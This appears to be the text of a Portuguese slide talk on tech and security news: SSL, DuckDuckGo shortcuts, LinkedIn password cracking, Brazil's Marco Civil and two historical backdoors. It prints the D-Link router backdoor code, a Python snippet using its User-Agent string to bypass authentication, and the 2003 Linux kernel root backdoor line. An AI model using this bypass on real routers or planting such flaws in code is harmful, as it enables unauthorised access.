• Graduando em Ciência da Computação pelo IFCE Campus Maracanaú.
• 7 anos de experiência com Linux.
• Organizador do COMSOLiD a 6 anos.

SSL é uma nova camada de protocolo que opera em cima do protocolo TCP.

Permite ambas as máquina, cliente e servidor, estabelecer uma conexão criptografada.

Entretanto isso é uma especificação, ou seja, alguém tem que implementar. Alguns órgãos que a implementam:

• OpenSSL (http://www.openssl.org/) - Implementação livre e gratuita do SSL.
• Apache-SSL (http://www.apache-ssl.org/) - um servidor web seguro, baseado no OpenSSL.
• SSLeay (ftp://ftp.uni-mainz.de/pub/internet/security/ssl/SSL/) - uma implementação gratuita do Netscape's Secure Socket Layer.
• Planet SSL (http://www.rsasecurity.com/standards/ssl/developers.html) - provê SSL para programas em C e Java.

Exemplo de mesma implementação para problemas diferentes:

multiplicação de 2 números:

2 * 3

ou

2 + 2 + 2

Duck Duck Go permite hacks mais engenhosos. Vamos a eles:

• !g comsolid - busca comsolid no google
• expand http://va.mu/dIwg - mostra a URL original
• ip address - mostra seu endereço IP
• github sige - mostra repositórios do github
• @comsolid - mostra usuário do Twitter
• age of linus torvalds - diz a idade
• define free software - define uma palavra ou frase
• weather in fortaleza - mostra a previsão do tempo
• daft punk soundcloud - busca músicas no soundcloud

Após quebrar 60% das senhas usando listas de senhas disponíveis em:

• Hashcat - http://hashcat.net/oclhashcat-plus/
• John the Ripper - http://www.openwall.com/john/

Para os outros 40% ele ficou "sem palavras", então onde encontrá-las?

Que tal Wikipedia, Youtube, Bíblia, Projeto Gutenberg?

Na lista existiam:

• 1 - linkedin (4408)
• 2 - link (2638)
• 3 - linked (2135)

Outras senhas encontradas:

• 8 - love (1018)
• 11 - password (856)
• 16 - abc (750)

Mais informações em: http://www.ma.rhul.ac.uk/static/techrep/2013/MA-2013-07.pdf

Todos sabemos que a D-Link é especializada em fazer roteadores, e eles são um bom local para backdoors. E isso foi exatamente que Craig Heffner autor no blog http://www.devttys0.com encontrou.

Ele encontrou a partir de uma engenharia reversa no firmware de uma dos roteadores.

Após notar que certa função chamada alpha_auth_check soava suspeita, ele foi saber o que exatamente ela fazia. Após um tempo ele chegou no seguinte trecho de código:

int alpha_auth_check(struct http_request_t *request) {
   if(strstr(request->url, "graphic/") ||
      strstr(request->url, "public/") ||
      strcmp(request->user_agent,
          "xmlset_roodkcableoj28840ybtide") == 0) {
      return AUTH_OK;
   } else {
      if(check_login(request->0xC, request->0xE0) != 0) {
         return AUTH_OK;
      }
   }
   return AUTH_FAIL;
}

Baseado no código fonte das páginas HTML e outros detalhes é sensato concluir que os seguintes modelos são afetados:

• DIR-100
• DIR-120
• DI-624S
• DI-524UP
• DI-604S
• DI-604UP
• DI-604+
• TM-G5240

Quem quiser fazer um teste real existe um código em Python escrito pelo próprio Craig e pode ser encontrado em:

http://pastebin.com/vbiG42VD

# Normally only admins can access the tools_misc.xgi page;
# use the backdoor user-agent to bypass authentication
import urllib2
# ...
req = urllib2.Request(url+buf,
    headers={
        'User-Agent': 'xmlset_roodkcableoj28840ybtide'
    })
urllib2.urlopen(req)

http://linux.slashdot.org/story/13/10/09/1551240/the-linux-backdoor-attempt-of-2003

Em 2003, houve uma tentativa de backdoor no Kernel do Linux.

/* ... */
if ((options == (__WCLONE|__WALL))
    && (current->uid = 0))
        retval = -EINVAL;
/* ... */

Bastava chamar a função wait4 e você viraria root.

Comparemos os códigos original e o backdoor, e vejam se encontram a diferença.

/* ... */
if ((options == (__WCLONE|__WALL))
    && (current->uid = 0))
        retval = -EINVAL;
/* ... */

/* ... */
if ((options == (__WCLONE|__WALL))
    && (current->uid == 0))
        retval = -EINVAL;
/* ... */

O que é Marco Civil?

É um projeto de Lei que visa estabelecer direitos e deveres na utilização da Internet no Brasil. É a constituição da Internet no país.

• Neutralidade: proíbe que provedores de internet discriminem certos serviços em detrimento de outros.
• Armazenamento de dados: Operação de coleta de dados no Brasil deve respeitar a privacidade, proteção dos dados e sigilo das comunicações privadas.
• Retirada de conteúdo: entidades que oferecem conteúdo e aplicações só serão responsabilizadas por danos gerados por terceiros se não acatarem ordem judicial exigindo a retirada dessas publicações.

• Fim do marketing dirigido: as empresas de acesso não poderão "espiar" o conteúdo das informações trocadas pelos usuários na rede. Há interesse em fazer isso com fins comerciais, como para publicidade.
• Sigilo e privacidade: Provedores de acesso à internet serão obrigados a guardar os registros das horas de acesso e do fim da conexão dos usuários pelo prazo de seis meses, mas isso deve ser feito em ambiente controlado.

Para mais detalhes: http://www.molon1313.com.br/marco-civil-da-internet/